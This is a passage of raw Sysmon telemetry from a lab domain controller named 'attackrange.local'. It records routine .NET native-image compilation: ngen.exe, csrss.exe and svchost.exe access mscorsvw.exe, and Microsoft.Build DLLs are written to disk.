13:21:29.256{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4559-6000-A801-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:29.256{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4559-6000-A801-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:29.022{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4559-6000-A701-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:29.006{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4559-6000-A701-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:29.006{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4559-6000-A701-000000009A01}1384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:33.803{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-455D-6000-AA01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:33.788{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-455D-6000-AA01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:33.788{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-455D-6000-AA01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:33.647{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-455D-6000-A901-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:33.632{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-455D-6000-A901-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:33.632{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-455D-6000-A901-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:33.428{08A6967A-4559-6000-A801-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b44-0\Microsoft.Build.dll2021-01-14 13:21:33.428 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:34.163{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-455E-6000-AC01-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:34.147{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-455E-6000-AC01-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:34.147{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-455E-6000-AC01-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:34.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-455E-6000-AB01-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:34.085{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-455E-6000-AB01-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:34.085{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-455E-6000-AB01-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:34.022{08A6967A-455D-6000-AA01-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1334-0\Microsoft.Build.Conversion.v4.0.dll2021-01-14 13:21:34.022 11241100x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:35.929{08A6967A-455F-6000-AE01-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\be8-0\Microsoft.Build.Framework.dll2021-01-14 13:21:35.929 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:35.632{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-455F-6000-AE01-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:35.616{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-455F-6000-AE01-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:35.616{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-455F-6000-AE01-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:35.585{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-455F-6000-AD01-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:35.569{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-455F-6000-AD01-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:35.569{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-455F-6000-AD01-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:35.475{08A6967A-455E-6000-AC01-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1298-0\Microsoft.Build.Engine.dll2021-01-14 13:21:35.475 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:36.163{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4560-6000-B001-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:36.147{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4560-6000-B001-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 